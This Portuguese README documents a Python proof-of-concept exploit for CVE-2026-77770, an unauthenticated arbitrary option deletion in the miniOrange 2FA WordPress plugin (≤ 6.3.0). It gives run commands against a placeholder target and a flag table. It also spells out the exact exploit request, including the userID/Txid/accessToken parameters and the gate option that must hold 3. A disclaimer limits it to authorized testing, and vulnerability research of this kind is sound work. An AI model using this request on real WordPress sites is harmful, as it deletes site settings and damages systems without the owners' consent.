
PoC em Python para CVE-2026-77770, uma falha não autenticada de exclusão arbitrária de opções do WordPress no plugin miniOrange 2FA (<= 6.3.0) através do link de verificação de e-mail.
miniOrange 2FA CVE POC
miniOrange 2FA (plugin WordPress miniorange-2-factor-authentication) ≤ 6.3.0 — exclusão arbitrária de opções do WordPress sem autenticação através do link de verificação de e-mail (userID / Txid / accessToken).
Apenas para testes autorizados. Não execute isto contra sistemas que não possui ou para os quais não tem permissão de teste.
Requer: Python 3, apenas biblioteca padrão.
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test --delete blogname
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u https://TARGET --delete blogname --insecure
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u TARGET --delete blogname
| Flag | O que faz |
|---|
-u / --url | Raiz do site WordPress (obrigatório). http:// ou https://; um hostname é tentado como HTTPS primeiro, depois HTTP. TLS autoassinado é tentado novamente automaticamente |
--test | Convidado: versão do plugin + popup de verificação de e-mail |
--delete OPTION | Exclui essa linha de wp_options. blogname é visível via /wp-json/ (BEFORE / AFTER) |
--gate OPTION | Opção cujo valor armazenado é 3 (o gate Txid). Repetível. Padrão: wp_page_for_privacy_policy, depois thread_comments_depth |
--insecure | Ignorar verificação TLS |
--timeout | Timeout HTTP em segundos (padrão 30) |
Sem autenticação. O gadget é um GET para /?userID=OPTION&Txid=GATE&accessToken=x. GATE deve atualmente conter o inteiro 3. Em uma falha da janela de 5 minutos, o plugin também grava GATE=0.
--test não exclui. --delete blogname é a prova pública (o título do site em /wp-json/ fica vazio). 6.3.1 prefixa as chaves (mo2f_oobe_*) então nomes sem prefixo não são excluídos.
Stdout: VERSION, HANDLER, PRESENT, SITENAME, OPTION, BEFORE, AFTER, GATE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, ATTEMPTED.

CVE: CVE-2026-77770. Changelog do plugin 6.3.1.